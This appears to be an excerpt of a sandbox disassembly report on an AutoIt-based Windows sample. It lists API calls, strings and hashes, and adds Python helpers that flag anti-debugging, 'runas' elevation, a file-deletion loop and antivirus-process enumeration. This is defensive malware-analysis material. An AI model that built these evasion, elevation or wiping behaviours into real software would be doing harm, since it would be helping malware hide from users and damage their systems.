                                                                                                                                                                                • Part of subcall function 00DA35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00DA3368,?), ref: 00DA3616
                                                                                                                                                                                • Part of subcall function 00DA35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00DA3368,?), ref: 00DA361F
                                                                                                                                                                                • Part of subcall function 00DA396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DA3A3C
                                                                                                                                                                              Strings
                                                                                                                                                                              • 0$, xrefs: 00DA3495
                                                                                                                                                                              • AutoIt, xrefs: 00DE3CA5
                                                                                                                                                                              • runas, xrefs: 00DE3D75
                                                                                                                                                                              • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00DE3CAA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                              • String ID: 0$$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                              • API String ID: 683915450-3328958999
                                                                                                                                                                              • Opcode ID: 771ef26eda6a14f8dc8cb388d2584941f3534a8a9fa8175a810b6541ba9059f7
                                                                                                                                                                              • Instruction ID: 352f9e3b531c216f872bf4bc01a0e6e6c40b31ea93b0449b8148e7eb4648e45c
                                                                                                                                                                              • Opcode Fuzzy Hash: 771ef26eda6a14f8dc8cb388d2584941f3534a8a9fa8175a810b6541ba9059f7
                                                                                                                                                                              • Instruction Fuzzy Hash: 95510330108385AEC711FF71AC05D6A7FA9EF96340F04142DF69A661A2DB64CA8DD772

Control-flow Graph (graph image not reproduced; nodes recovered from the page's node list)
• e0dc54-e0dc9b (entry): call dabf73 x3, call da5851, call e0eab0
• e0dc9d-e0dca6: call da6b7c
• e0dcab-e0dcdc: call da568e, FindFirstFileW
• e0dce2-e0dce7: branches to the DeleteFileW block or straight to FindNextFileW
• e0dce9-e0dd24: call dabed9, call da7bb5, call da6b7c, DeleteFileW
• e0dd26-e0dd38: FindNextFileW, loops back to e0dcde-e0dce0
• e0dd42-e0dd49 and e0dd4b-e0dd52: FindClose
• e0dd56-e0dd78 (exit): call dabd98 x3
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DA55D1,?,?,00DE4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DA5871
                                                                                                                                                                                • Part of subcall function 00E0EAB0: GetFileAttributesW.KERNEL32(?,00E0D840), ref: 00E0EAB1
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00E0DCCB
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E0DD1B
                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E0DD2C
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00E0DD43
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00E0DD4C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                              • API String ID: 2649000838-1173974218
                                                                                                                                                                              • Opcode ID: 6c5c250498d0976a25f9f0938762054355a95666582188e086dd722485b503e4
                                                                                                                                                                              • Instruction ID: b84284fa4d7a4ad57d30e0a9374fd6fe0a1ac5be47af93f5314d6cbace482bc3
                                                                                                                                                                              • Opcode Fuzzy Hash: 6c5c250498d0976a25f9f0938762054355a95666582188e086dd722485b503e4
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A31503100C3459FC201EB60DC859AFBBE8FE96314F445A5DF4D5A2192EB21D909C773
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00E0DDAC
                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00E0DDBA
                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00E0DDDA
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E0DE87
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                                              • Opcode ID: e893e8558a753cfb0741429a22b4cf1976a2dc5a551edf224748cfd2ce69d268
                                                                                                                                                                              • Instruction ID: c9bd8b2c847ac07fb86d167d237af1e4f4f55d54f3995007d2a6f03be6f3fb7d
                                                                                                                                                                              • Opcode Fuzzy Hash: e893e8558a753cfb0741429a22b4cf1976a2dc5a551edf224748cfd2ce69d268
                                                                                                                                                                              • Instruction Fuzzy Hash: 3F3161711083019FD710EF50DC85AAFBBE8EF95354F04092DF586971A1DB71D98ACBA2
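The three API listings above share one line format and each shows a behaviour the report's signatures call out: the AutoIt runtime start-up with its IsDebuggerPresent check and a ShellExecuteW call with the "runas" verb visible on the stack, the FindFirstFileW / DeleteFileW / FindNextFileW wipe loop over "\*.*", and the CreateToolhelp32Snapshot / Process32FirstW / Process32NextW walk behind the "Search for Antivirus process" detection. The Python triage helper below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses that bullet format and flags those sequences. The sample text is copied from the listings above; the rule labels are this example's own, and the treatment of "runas" appearing as an argument of a neighbouring call (GetForegroundWindow above) as evidence for the ShellExecuteW verb is an assumption about how the report prints stack slots.

```python
"""Added example (not part of the Joe Sandbox report or its IDA plugin):
parse the report's 'APIs' bullet lines and flag the API sequences that the
listings above exhibit."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# One bullet line: '• Name.MODULE(args), ref: ADDR', optionally prefixed with
# 'Part of subcall function X:'. The argument list and the comma before
# 'ref:' are both optional (CreateToolhelp32Snapshot is listed without them).
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]         # stack values as printed; '?' means unresolved
    ref: str                # call-site address
    subcall: Optional[str]  # callee address for 'Part of subcall' lines

def parse_api_listing(text: str) -> list[ApiCall]:
    """API calls in listing order; headings and non-API bullets are skipped."""
    calls: list[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        # A plain comma split is enough for the hex/'?' stack dumps in these
        # listings; a string argument containing commas would need more care.
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             m.group("ref").upper(), m.group("sub")))
    return calls

def _runas_on_stack(calls: list[ApiCall]) -> bool:
    # Assumption: the report prints raw stack slots, so the 'runas' verb for
    # ShellExecuteW surfaces as an argument of a neighbouring call
    # (GetForegroundWindow in the listing above), not of ShellExecuteW itself.
    return any("runas" in c.args for c in calls)

# (label, API names that must all be present, optional extra predicate).
# Labels are this example's own, not Joe Sandbox signature names.
RULES = [
    ("anti-debug check", {"IsDebuggerPresent"}, None),
    ("elevation via ShellExecute runas", {"ShellExecuteW"}, _runas_on_stack),
    ("directory wipe loop",
     {"FindFirstFileW", "DeleteFileW", "FindNextFileW"}, None),
    ("process enumeration (Toolhelp32)",
     {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}, None),
]

def classify(calls: list[ApiCall], include_subcalls: bool = True) -> list[str]:
    """Labels of every rule the listing satisfies, in RULES order."""
    pool = calls if include_subcalls else [c for c in calls if c.subcall is None]
    names = {c.name for c in pool}
    return [label for label, required, extra in RULES
            if required <= names and (extra is None or extra(pool))]

# Sample input copied from the listings above (indentation trimmed).
SAMPLE_AUTOIT_STARTUP = """\
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00DA3368,?), ref: 00DA33BB
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00DA3368,?), ref: 00DA33CE
• Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00DE3CB0
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E631F4,00E72418,?,?,?,?,?,?,?,00DA3368), ref: 00DE3D7A
• ShellExecuteW.SHELL32(00000000,?,?), ref: 00DE3D81
"""
SAMPLE_WIPE_LOOP = """\
• Part of subcall function 00DA5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DA55D1,?,?,00DE4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DA5871
• Part of subcall function 00E0EAB0: GetFileAttributesW.KERNEL32(?,00E0D840), ref: 00E0EAB1
• FindFirstFileW.KERNEL32(?,?), ref: 00E0DCCB
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00E0DD1B
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E0DD2C
• FindClose.KERNEL32(00000000), ref: 00E0DD43
• FindClose.KERNEL32(00000000), ref: 00E0DD4C
"""
SAMPLE_PROC_ENUM = """\
• CreateToolhelp32Snapshot.KERNEL32 ref: 00E0DDAC
• Process32FirstW.KERNEL32(00000000,?), ref: 00E0DDBA
• Process32NextW.KERNEL32(00000000,?), ref: 00E0DDDA
• CloseHandle.KERNEL32(00000000), ref: 00E0DE87
"""
```

Paste a whole "APIs" section into parse_api_listing and hand the result to classify; pass include_subcalls=False when only the function's own call sites should count, since "Part of subcall" lines are inherited from callees and can make an unrelated wrapper look like it deletes files or walks processes itself.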

Control-flow Graph (graph image not reproduced; nodes recovered from the page's node list)
• dbac3e-dbb063 (entry): call da8ec0, call dbbc58, call dae6a0
• Remaining nodes (dbb069 through df8b21) are internal basic blocks that call only other functions of the module (dbb5b6, dac98d, dbbbbe, dae6a0, da8ec0, da6c03, dab4b1, da8577, dc9334, da396b, da3907 and others); no Windows API call is resolved in this function, which matches the empty API ID below
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
• String ID: 4$@$P$`*$`$d0b$d10m0$d1b$d1r0,2$d5m0$e#$i$t$t$($($($(
• API String ID: 0-2951036942
• Opcode ID: 2ae4fddb7c1038051c9310f1b2f9e38ad350168450dbe056d371a601388f93b6
• Instruction ID: fec51987cb3f948b9ecaa2a4712ee7b9b9728648d281bcf5d4bd8e560ee9b0f4
• Opcode Fuzzy Hash: 2ae4fddb7c1038051c9310f1b2f9e38ad350168450dbe056d371a601388f93b6
• Instruction Fuzzy Hash: 0E626570508345CFC328DF24C485AAABBE0FF89314F14895EE58A9B351DBB1D949CFA2
APIs
• GetInputState.USER32 ref: 00DAEF07
• timeGetTime.WINMM ref: 00DAF107
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DAF228
• TranslateMessage.USER32(?), ref: 00DAF27B
• DispatchMessageW.USER32(?), ref: 00DAF289
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DAF29F
• Sleep.KERNEL32(0000000A), ref: 00DAF2B1
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
• String ID: (
• API String ID: 2189390790-2063206799
• Opcode ID: 6c0881520b35a8eed8fb201719d222d93e97928d037ec637877b0959e9cf170f
• Instruction ID: 082d15421fad1ce9c07ee2d5c63eb77a76731c301d5b231d5c89439a0b18fa2c
• Opcode Fuzzy Hash: 6c0881520b35a8eed8fb201719d222d93e97928d037ec637877b0959e9cf170f
• Instruction Fuzzy Hash: 5642F230604305EFD724CB64C844BBABBE5FF82304F19856DE695972A1C771E988CBB6

Control-flow Graph
• Graph for the function at da370f (rendered graph and its executed/not-executed colouring not captured). Blocks that call APIs: DefWindowProcW (da376f), KillTimer (da37a0), SetTimer and RegisterWindowMessageW (da37bc), CreatePopupMenu (da37e5), PostQuitMessage (da3804), SetFocus (de3dbf), MoveWindow (de3dd0).
APIs
• DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00DA3709,?,?), ref: 00DA3777
• KillTimer.USER32(?,00000001,?,?,?,?,?,00DA3709,?,?), ref: 00DA37A3
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DA37C6
• RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00DA3709,?,?), ref: 00DA37D1
• CreatePopupMenu.USER32 ref: 00DA37E5
• PostQuitMessage.USER32(00000000), ref: 00DA3806
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: 0$$0$$TaskbarCreated
• API String ID: 129472671-3836791346
• Opcode ID: 12e6c746aa311b62bff559f7a61dffd2d246940506e92f0b5852c3f85ce478af
• Instruction ID: 0d0facd14ae0eb4d170250abe987beca0bcb9369e66177ee99385a57e5f6d76f
• Opcode Fuzzy Hash: 12e6c746aa311b62bff559f7a61dffd2d246940506e92f0b5852c3f85ce478af
• Instruction Fuzzy Hash: 6141E6F1104245BFDB146F3DDC4EB793A67EB46300F08422AF64AA6191DA74DF889771

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00DA3657
• RegisterClassExW.USER32(00000030), ref: 00DA3681
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DA3692
• InitCommonControlsEx.COMCTL32(?), ref: 00DA36AF
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DA36BF
• LoadIconW.USER32(000000A9), ref: 00DA36D5
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DA36E4
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: d21ba5829296c4d84ee76eeed04017d92676c60f584733b704e231b55a3e201a
• Instruction ID: e5f8ef1dfaab22f251add9ed534193084f12444b5364f67bee33b638de50fcb2
• Opcode Fuzzy Hash: d21ba5829296c4d84ee76eeed04017d92676c60f584733b704e231b55a3e201a
• Instruction Fuzzy Hash: 0C21EDB1905308AFDB00DFAAEC89A9DBFB4FB08710F00811AF615B62A0D7B54588CF90

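The RegisterClassExW call in the function above registers a window class named "AutoIt v3 GUI", and a later function in this report opens HKEY_CURRENT_USER (0x80000001) \Software\AutoIt v3\AutoIt with RegOpenKeyExW to read its "Include" value. Both strings are artefacts of the AutoIt v3 interpreter, the stub that compiled AutoIt scripts are built on, so a triager can conclude that the image mapped at 00DA0000 in process 12 is an AutoIt runtime rather than hand-written native code. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it scans a raw dump or PE image for those two markers (plus the generic TaskbarCreated string, kept only for contrast, since any tray application registers it) in both UTF-16LE and ASCII form and maps each hit to a virtual address. The image base 0x00DA0000 is taken from the report's "Offset" field (assumption: file offset 0 of the dump corresponds to that address); the sample buffer is constructed, and the function and variable names are the example's own.

```python
"""Scan a memory dump or PE image for AutoIt v3 runtime markers.

Added example (not from the Joe Sandbox report or the sample). The markers
are the strings the report shows as API arguments / String IDs in the image
mapped at 00DA0000 in process 12:
  - "AutoIt v3 GUI"               window class passed to RegisterClassExW
  - "Software\\AutoIt v3\\AutoIt" key opened with RegOpenKeyExW(HKCU=0x80000001)
  - "Include"                     value read with RegQueryValueExW
  - "TaskbarCreated"              generic Win32 string, kept only for contrast
"""
from __future__ import annotations

import sys
from dataclasses import dataclass

# Image base of the dump, from the report's "Offset: 00DA0000" (assumption:
# file offset 0 of the .sdmp corresponds to this virtual address).
IMAGE_BASE = 0x00DA0000

# Marker name -> text. Only the first two are AutoIt-specific.
AUTOIT_MARKERS = {
    "window_class": "AutoIt v3 GUI",
    "registry_key": "Software\\AutoIt v3\\AutoIt",
    "registry_value": "Include",
    "taskbar_msg": "TaskbarCreated",
}
SPECIFIC = ("window_class", "registry_key")


@dataclass(frozen=True)
class Hit:
    name: str       # key from AUTOIT_MARKERS
    offset: int     # byte offset into the scanned buffer
    encoding: str   # "utf-16-le" (what the W APIs consume) or "ascii"


def find_markers(data: bytes) -> list[Hit]:
    """Return every occurrence of every marker, in both encodings, sorted by offset."""
    hits: list[Hit] = []
    for name, text in AUTOIT_MARKERS.items():
        for enc in ("utf-16-le", "ascii"):
            needle = text.encode(enc)
            pos = data.find(needle)
            while pos != -1:
                hits.append(Hit(name, pos, enc))
                pos = data.find(needle, pos + 1)
    return sorted(hits, key=lambda h: (h.offset, h.name))


def is_autoit_runtime(data: bytes) -> bool:
    """True only if both AutoIt-specific markers are present; TaskbarCreated alone is noise."""
    found = {h.name for h in find_markers(data)}
    return all(name in found for name in SPECIFIC)


def to_va(offset: int, base: int = IMAGE_BASE) -> int:
    """Map a buffer offset to a virtual address for cross-referencing the report's refs."""
    return base + offset


def scan_file(path: str) -> list[Hit]:
    with open(path, "rb") as fh:
        return find_markers(fh.read())


def _u16(text: str) -> bytes:
    return text.encode("utf-16-le") + b"\x00\x00"  # NUL-terminated wide string


# Constructed sample buffer (not bytes from the real dump): padding plus the
# four strings laid out as a compiler would place them in .rdata.
SAMPLE = (
    b"\x00" * 64
    + _u16("AutoIt v3 GUI")
    + b"\x90" * 32
    + _u16("Software\\AutoIt v3\\AutoIt")
    + _u16("Include")
    + _u16("TaskbarCreated")
)


def main(argv: list[str]) -> None:
    # Usage: python autoit_markers.py <dump-or-pe>; with no argument the constructed sample is scanned.
    data = open(argv[1], "rb").read() if len(argv) > 1 else SAMPLE
    for h in find_markers(data):
        print(f"{h.name:15s} {h.encoding:9s} +0x{h.offset:06x}  VA 0x{to_va(h.offset):08X}")
    print("AutoIt runtime markers present:", is_autoit_runtime(data))


if __name__ == "__main__":
    main(sys.argv)
```

Run it against the .sdmp listed under Memory Dump Source (the one with Offset: 00DA0000) and the reported VAs can be compared with the refs in this report; run it against the original Setup.exe and the dropped files to see which of them carries the AutoIt stub. The UTF-16LE pass matters because the markers are arguments to the W-suffixed APIs and an ASCII-only strings run would miss them.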
Control-flow Graph
• Graph for the function at de09db (rendered graph and its executed/not-executed colouring not captured). Blocks that call APIs: subcall de071a (CreateFileW) at de0a4b, de0aa7 and de0c7c; GetFileType (de0b01); GetLastError on the error paths (de0ad6, de0b0c, de0cb1); CloseHandle (de0b0c, de0c7c).
APIs
  • Part of subcall function 00DE071A: CreateFileW.KERNEL32(00000000,00000000,?,00DE0A84,?,?,00000000,?,00DE0A84,00000000,0000000C), ref: 00DE0737
• GetLastError.KERNEL32 ref: 00DE0AEF
• __dosmaperr.LIBCMT ref: 00DE0AF6
• GetFileType.KERNEL32(00000000), ref: 00DE0B02
• GetLastError.KERNEL32 ref: 00DE0B0C
• __dosmaperr.LIBCMT ref: 00DE0B15
• CloseHandle.KERNEL32(00000000), ref: 00DE0B35
• CloseHandle.KERNEL32(?), ref: 00DE0C7F
• GetLastError.KERNEL32 ref: 00DE0CB1
• __dosmaperr.LIBCMT ref: 00DE0CB8
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 5dd40e85af6857b155b7792a77ae246a5e996809b5e790539810f70d4141a6a1
• Instruction ID: d1adf3e100ed33a696f4e307fa42d956af8be624b45af55d1fd7a7f2f9e0757b
• Opcode Fuzzy Hash: 5dd40e85af6857b155b7792a77ae246a5e996809b5e790539810f70d4141a6a1
• Instruction Fuzzy Hash: 87A12432A042898FDF19EF69D852BAD3FA1EB06324F180159F851EB391C7719C96CB71

Control-flow Graph

APIs
  • Part of subcall function 00DA5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00DE4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00DA55B2
  • Part of subcall function 00DA5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00DA525A
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00DA53C4
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00DE4BFD
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00DE4C3E
• RegCloseKey.ADVAPI32(?), ref: 00DE4C80
• _wcslen.LIBCMT ref: 00DE4CE7
• _wcslen.LIBCMT ref: 00DE4CF6
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
                                                                                                                                                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                              • API String ID: 98802146-2727554177

Control-flow Graph
APIs
• GetSysColorBrush.USER32(0000000F), ref: 00DA34DE
• LoadCursorW.USER32(00000000,00007F00), ref: 00DA34ED
• LoadIconW.USER32(00000063), ref: 00DA3503
• LoadIconW.USER32(000000A4), ref: 00DA3515
• LoadIconW.USER32(000000A2), ref: 00DA3527
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DA353F
• RegisterClassExW.USER32(?), ref: 00DA3590
  • Part of subcall function 00DA3624: GetSysColorBrush.USER32(0000000F), ref: 00DA3657
  • Part of subcall function 00DA3624: RegisterClassExW.USER32(00000030), ref: 00DA3681
  • Part of subcall function 00DA3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DA3692
  • Part of subcall function 00DA3624: InitCommonControlsEx.COMCTL32(?), ref: 00DA36AF
  • Part of subcall function 00DA3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DA36BF
  • Part of subcall function 00DA3624: LoadIconW.USER32(000000A9), ref: 00DA36D5
  • Part of subcall function 00DA3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DA36E4
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
